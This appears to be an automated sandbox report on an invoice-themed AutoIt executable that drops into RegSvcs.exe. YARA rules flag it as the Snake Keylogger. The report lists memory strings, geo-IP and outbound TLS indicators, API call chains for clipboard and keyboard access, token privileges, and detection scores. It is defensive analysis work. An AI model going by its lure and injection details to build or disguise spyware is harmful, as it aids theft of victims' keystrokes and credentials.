                  Source: RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: RegSvcs.exe, 00000002.00000002.4475356588.00000000030EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.000000000315E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: DHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.00000000030EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: RegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: RegSvcs.exe, 00000002.00000002.4475356588.000000000315E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.0000000003118000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: RegSvcs.exe, 00000002.00000002.4475356588.0000000003289000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: RegSvcs.exe, 00000002.00000002.4475356588.000000000327A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/(
                  Source: RegSvcs.exe, 00000002.00000002.4475356588.0000000003284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBsq
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49868 version: TLS 1.2
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003AEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_003AEAFF
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003AED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_003AED6A
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003AEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_003AEAFF
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_0039AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0039AA57
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003C9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_003C9576

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: DHL DOC INV 191224.gz.exe PID: 2612, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 6608, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Binary is likely a compiled AutoIt script file
                  Source: DHL DOC INV 191224.gz.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: DHL DOC INV 191224.gz.exe, 00000000.00000000.2016872172.00000000003F2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_60409e46-8
                  Source: DHL DOC INV 191224.gz.exe, 00000000.00000000.2016872172.00000000003F2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_70b09b3f-d
                  Source: DHL DOC INV 191224.gz.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6d827433-8
                  Source: DHL DOC INV 191224.gz.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_8a4f6258-e
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_0039D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0039D5EB
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_00391201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00391201
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_0039E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0039E8F6
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_0033BF400_2_0033BF40
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003380600_2_00338060
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003A20460_2_003A2046
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003982980_2_00398298
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_0036E4FF0_2_0036E4FF
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_0036676B0_2_0036676B
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003C48730_2_003C4873
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_0035CAA00_2_0035CAA0
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_0033CAF00_2_0033CAF0
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_0034CC390_2_0034CC39
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_00366DD90_2_00366DD9
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_0034B1190_2_0034B119
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003391C00_2_003391C0
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003513940_2_00351394
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003517060_2_00351706
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_0035781B0_2_0035781B
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003379200_2_00337920
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_0034997D0_2_0034997D
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003519B00_2_003519B0
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_00357A4A0_2_00357A4A
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_00351C770_2_00351C77
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_00357CA70_2_00357CA7
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003BBE440_2_003BBE44
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_00369EEE0_2_00369EEE
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_00351F320_2_00351F32
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_00EB02F80_2_00EB02F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_015AC1462_2_015AC146
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_015AA0882_2_015AA088
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_015A53622_2_015A5362
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_015AD2C82_2_015AD2C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_015AD5992_2_015AD599
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_015AC4682_2_015AC468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_015AC7382_2_015AC738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_015A69A02_2_015A69A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_015A3B952_2_015A3B95
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_015ACD282_2_015ACD28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_015AEC182_2_015AEC18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_015A6FC82_2_015A6FC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_015ACFF72_2_015ACFF7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_015A3E092_2_015A3E09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_015A29EC2_2_015A29EC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_015A3AA12_2_015A3AA1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_015AEC0A2_2_015AEC0A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_015AFC902_2_015AFC90
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: String function: 00339CB3 appears 31 times
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: String function: 0034F9F2 appears 40 times
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: String function: 00350A30 appears 46 times
                  Source: DHL DOC INV 191224.gz.exe, 00000000.00000003.2050455073.00000000039AD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL DOC INV 191224.gz.exe
                  Source: DHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs DHL DOC INV 191224.gz.exe
                  Source: DHL DOC INV 191224.gz.exe, 00000000.00000003.2051035636.0000000003803000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL DOC INV 191224.gz.exe
                  Source: DHL DOC INV 191224.gz.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: DHL DOC INV 191224.gz.exe PID: 2612, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 6608, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, .csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, .csBase64 encoded string: 'i83QYBE0IwbhVlhQf+svqd5kEAnbbC2RDfNTprP0fRDedGK+iYw6VSAIZu6bbBQz'
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@3/3
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003A37B5 GetLastError,FormatMessageW,0_2_003A37B5
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003910BF AdjustTokenPrivileges,CloseHandle,0_2_003910BF
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003916C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_003916C3
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003A51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_003A51CD
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003BA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_003BA67C
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003A648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_003A648E
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeCode function: 0_2_003342A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_003342A2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeFile created: C:\Users\user\AppData\Local\Temp\aut2DC9.tmpJump to behavior
                  Source: DHL DOC INV 191224.gz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: DHL DOC INV 191224.gz.exeVirustotal: Detection: 47%
                  Source: DHL DOC INV 191224.gz.exeReversingLabs: Detection: 73%
                  Source: unknownProcess created: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe "C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe"
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe"
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exeSection loaded: wldp.dllJump to behavior
                  Source: DHL DOC INV 191224.gz.exeStatic file information: File size 1106432 > 1048576
                  Source: DHL DOC INV 191224.gz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: DHL DOC INV 191224.gz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: DHL DOC INV 191224.gz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: DHL DOC INV 191224.gz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: DHL DOC INV 191224.gz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: DHL DOC INV 191224.gz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: DHL DOC INV 191224.gz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
